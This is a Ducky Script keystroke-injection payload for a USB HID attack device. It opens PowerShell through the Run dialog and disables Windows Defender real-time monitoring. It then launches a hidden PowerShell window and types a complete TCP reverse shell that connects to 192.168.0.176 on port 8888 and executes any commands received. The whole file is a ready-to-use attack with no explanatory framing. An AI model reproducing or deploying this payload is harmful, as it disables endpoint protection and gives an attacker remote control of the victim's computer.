DELAY 2000
GUI r
DELAY 2000
STRING powershell 
DELAY 250
ENTER
DELAY 2000
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 500
STRING 
DELAY 500
ENTER
DELAY 500
GUI r
DELAY 2000
STRING powershell -w h
DELAY 250
ENTER
DELAY 2000
STRING  $client = new-object system.net.sockets.tcpclient("192.168.0.176",8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
ENTER
DELAY 2000
GUI r
DELAY 2000
STRING powershell -w h
DELAY 250
ENTER
DELAY 2000
STRING
DELAY 2000
STRING exit
DELAY 250
ENTER